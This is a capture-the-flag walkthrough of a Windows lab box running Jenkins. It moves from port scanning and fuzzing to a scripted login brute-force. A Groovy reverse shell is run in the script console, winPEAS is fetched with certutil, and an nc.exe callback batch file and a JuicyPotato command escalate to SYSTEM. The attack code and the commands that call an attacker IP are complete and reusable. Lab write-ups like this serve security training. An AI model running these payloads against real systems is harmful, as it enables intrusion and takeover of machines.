
Alfred Walkthrough

$ nmap -p0-65535 10.10.54.149 -T5
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-29 20:28 IST
Stats: 0:02:46 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Nmap scan report for 10.10.54.149
Host is up (0.16s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
3389/tcp open  ms-wbt-server
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 179.88 seconds
$ nmap -sV -sC -p80,3389,8080 10.10.54.149
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-29 20:36 IST
Nmap scan report for 10.10.54.149
Host is up (0.16s latency).

PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
3389/tcp open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=alfred
| Not valid before: 2021-06-28T14:38:41
|_Not valid after:  2021-12-28T14:38:41
|_ssl-date: 2021-06-29T15:06:43+00:00; -1s from scanner time.
8080/tcp open  http               Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.52 seconds

No public exploit gives us a foothold on IIS 7.5 by itself, so port 80 gets a quick look first; port 8080 (Jetty, the servlet container Jenkins ships with) is the more promising target.

Home page on port 80

BruceWayne

Let's inspect the page for any findings.

inspectpage

Let's fuzz for directories.

$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ  -u http://10.10.54.149/FUZZ  -t 200 -ic

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.54.149/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

                        [Status: 200, Size: 289, Words: 18, Lines: 12]
                        [Status: 200, Size: 289, Words: 18, Lines: 12]
:: Progress: [220547/220547] :: Job [1/1] :: 1117 req/sec :: Duration: [0:03:46] :: Errors: 0 ::

The only matches are blank entries that return the same 289-byte page as the document root, so they are false positives rather than findings; adding -fs 289 to the ffuf command would filter them out. There is nothing useful on port 80.

  • We could brute-force RDP on port 3389.
  • It may lock accounts out, though.
  • Let's keep that as a last resort.

Home page on port 8080 (Jenkins)

homepage

Inspecting the page

Jenkinsinspect

From a web search, the default Jenkins username to try is admin.

Let's brute-force the login form with Burp Intruder.

burpintruder

Redirection

Using one of the password lists from SecLists, the password is obtained: Jenkins answers a failed login with a redirect to /loginError, so the one attempt whose redirect points elsewhere (the dashboard) is the valid one.

The password is admin too.
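The same brute-force as a script rather than Burp Intruder. This is an added example, not the walkthrough's own tooling; it assumes Jenkins' standard form-login endpoint /j_acegi_security_check with the fields j_username and j_password, a failed login redirecting to /loginError (so a redirect anywhere else is treated as success), and a constructed five-word password list in place of a SecLists file. The delay between attempts is there for the lockout concern raised earlier.

```python
"""Brute-force a Jenkins form login, deciding success from the redirect target.

Added example, not the walkthrough's own tooling. Assumptions: Jenkins'
/j_acegi_security_check endpoint with j_username/j_password fields, failures
redirecting to /loginError, and a constructed password list.
"""
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Optional, Tuple

LOGIN_PATH = "/j_acegi_security_check"

# Constructed sample password list (a SecLists file would be used in practice).
SAMPLE_PASSWORDS = ["password", "123456", "jenkins", "admin", "letmein"]

# A transport POSTs a form to a URL and returns (status, Location header).
Transport = Callable[[str, dict], Tuple[int, Optional[str]]]


def classify(status: int, location: Optional[str]) -> bool:
    """True when the response looks like a successful Jenkins login.

    Jenkins answers good and bad credentials alike with a redirect; the
    difference is the Location: failures go to /loginError, success goes to
    the page named in the 'from' field (the dashboard here).
    """
    if status not in (301, 302, 303, 307) or location is None:
        return False
    path = urllib.parse.urlsplit(location).path.rstrip("/")
    return not path.endswith("/loginError")


def urllib_transport(url: str, form: dict) -> Tuple[int, Optional[str]]:
    """POST the form without following redirects; return (status, Location)."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # surface the 3xx instead of following it

    opener = urllib.request.build_opener(NoRedirect)
    data = urllib.parse.urlencode(form).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as e:  # 3xx (and 4xx) land here with NoRedirect
        return e.code, e.headers.get("Location")


def brute_force(base_url: str, username: str, passwords: Iterable[str],
                transport: Transport = urllib_transport,
                delay: float = 0.5) -> Optional[str]:
    """Try each password in turn; return the first one classified as a success.

    The delay keeps the request rate modest: the same lockout caution that
    applies to RDP applies to any password policy behind a web login.
    """
    url = base_url.rstrip("/") + LOGIN_PATH
    for pw in passwords:
        form = {"j_username": username, "j_password": pw,
                "from": "/", "Submit": "Sign in"}
        status, location = transport(url, form)
        if classify(status, location):
            return pw
        time.sleep(delay)
    return None


if __name__ == "__main__":
    # Target IP from the walkthrough; run against a lab box only.
    print("password:", brute_force("http://10.10.54.149:8080", "admin", SAMPLE_PASSWORDS))
```

Because the transport is injectable, the decision logic can be exercised without a target; swap in Burp's proxy or a rate-limited transport without touching the loop.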

Credential


Using the credentials obtained during the enumeration stage (admin:admin), let's log in to Jenkins; we are welcomed with the UI below.

JenkinsLoggedInUI

Enumerating the Jenkins UI further, we find the Script Console under Manage Jenkins.

I tried whoami, a command common to both Windows and Unix systems, and got an error: the console evaluates Groovy, so a bare shell command is not valid input.

scriptconsole.png

A quick bit of search-engine dorking turned up a reverse shell written in Groovy.

Payload code (Groovy; host and port are the values to tweak so they point at your listener):

String host="localhost";   // attacker IP, e.g. the 10.14.12.103 used later in this walkthrough
int port=8044;             // port the listener on the attacker box is bound to
String cmd="cmd.exe";      // Windows target, so cmd.exe rather than /bin/sh
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
// pump bytes between the socket and the process until either side goes away
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());
  so.flush();po.flush();
  Thread.sleep(50);
  try{p.exitValue();break;}catch(Exception e){}
};
p.destroy();s.close();

Once the payload is tweaked (host set to our IP, port to our listener) and run in the script console, I am greeted with a cmd prompt on the listener.

reverseshell_proof.png

Getting the User flag

usertxt.png


Running systeminfo shows the architecture is 64-bit, which decides which winPEAS build to fetch.

systeminfo

sysinfo.png

I copied winPEAS.exe and winPEAS.bat to the target (fetched with certutil, below) to automate the search for privilege-escalation loopholes; neither turned up anything usable.

certutil -urlcache -f http://10.14.12.103:8991/winPEASx64.exe winPEASx64.exe

winPeasexe

winpeasbat.png

PowerShell was not working for me, so I used only winPEAS and skipped its PowerShell counterpart, PowerUp.ps1.

Falling back to manual privilege-escalation checks, I found SeImpersonatePrivilege and SeDebugPrivilege enabled:

whoami /priv

privs.png
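Reading whoami /priv with an eye for escalation paths, as an added example that is not part of the walkthrough. The sample output is constructed (the table layout cmd.exe prints, with SeImpersonatePrivilege and SeDebugPrivilege enabled as on this box); the mapping from privilege to technique is general Windows privilege-escalation knowledge and goes beyond the two privileges the text mentions.

```python
"""Flag token privileges that open known escalation paths in `whoami /priv` output.

Added example, not part of the walkthrough. SAMPLE_OUTPUT is constructed; the
privilege-to-technique mapping is general Windows knowledge, not from the page.
"""
from typing import Dict, List

# Why each privilege matters for escalation (general, not page-specific).
INTERESTING = {
    "SeImpersonatePrivilege": "potato family (JuicyPotato, PrintSpoofer, ...) to SYSTEM",
    "SeAssignPrimaryTokenPrivilege": "potato family to SYSTEM",
    "SeDebugPrivilege": "open SYSTEM processes, inject into them or dump LSASS",
    "SeBackupPrivilege": "read any file, including the SAM and SYSTEM hives",
    "SeRestorePrivilege": "write any file, e.g. replace a service binary",
    "SeTakeOwnershipPrivilege": "take ownership of protected files and keys",
    "SeLoadDriverPrivilege": "load a vulnerable signed driver",
}

# Constructed sample in the layout cmd.exe prints for `whoami /priv`.
SAMPLE_OUTPUT = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeSecurityPrivilege           Manage auditing and security log          Disabled
SeTakeOwnershipPrivilege      Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege         Load and unload device drivers            Disabled
SeSystemProfilePrivilege      Profile system performance                Disabled
SeSystemtimePrivilege         Change the system time                    Disabled
SeProfileSingleProcessPrivilege Profile single process                  Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority            Disabled
SeCreatePagefilePrivilege     Create a pagefile                         Disabled
SeBackupPrivilege             Back up files and directories             Disabled
SeRestorePrivilege            Restore files and directories             Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeDebugPrivilege              Debug programs                            Enabled
SeSystemEnvironmentPrivilege  Modify firmware environment values        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system       Disabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeManageVolumePrivilege       Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links                     Disabled
"""


def parse_privileges(text: str) -> Dict[str, str]:
    """Map privilege name -> state ('Enabled'/'Disabled') from whoami /priv output."""
    privs: Dict[str, str] = {}
    for line in text.splitlines():
        parts = line.split()
        # Data rows start with an Se...Privilege name and end with the State column;
        # the description in between may be any number of words.
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
            privs[parts[0]] = parts[-1]
    return privs


def escalation_candidates(privs: Dict[str, str], include_disabled: bool = True) -> List[str]:
    """Return the interesting privileges present in the token, enabled ones first.

    Disabled is not the same as absent: a privilege that is present but
    disabled can be re-enabled by the process holding it (AdjustTokenPrivileges),
    so it is still listed unless include_disabled is False.
    """
    hits = [p for p in privs if p in INTERESTING and (include_disabled or privs[p] == "Enabled")]
    return sorted(hits, key=lambda p: (privs[p] != "Enabled", p))


if __name__ == "__main__":
    found = parse_privileges(SAMPLE_OUTPUT)
    for p in escalation_candidates(found):
        print(f"{p:32} {found[p]:9} {INTERESTING[p]}")
```

Pipe the real output in (whoami /priv > privs.txt, then read the file in place of SAMPLE_OUTPUT) and the enabled entries at the top of the list are the ones to try first; here that is SeImpersonatePrivilege, which is exactly the potato route taken next.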

SeImpersonatePrivilege is what the potato family abuses, so I went for a JuicyPotato attack.

potatoexe.png

Transferring a netcat binary to the target

netcat1

Creating a batch file that calls back to a listener on our machine:

echo "C:\Program Files (x86)\Jenkins\nc.exe" -e cmd.exe 10.14.12.103 9186 > priv.bat

privbat

Executing the potato attack

j.exe -p "C:\Program Files (x86)\Jenkins\priv.bat" -l 9186 -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}

{03ca98d6-ff5d-49b8-abc6-03dd84127020} is the CLSID of the COM server JuicyPotato coerces into authenticating to its listener; more CLSIDs, sorted by Windows version, are kept in the JuicyPotato repository's CLSID list (https://github.com/ohpe/juicy-potato/tree/master/CLSID). Note that -l 9186 is the local port JuicyPotato's COM listener binds on the target; it only happens to share its number with the port nc calls back to on 10.14.12.103.

exexutingpotato.png

Grabbing the shell

listner

proof_root.png

Getting the root flag

root

Clean up

cleanup.png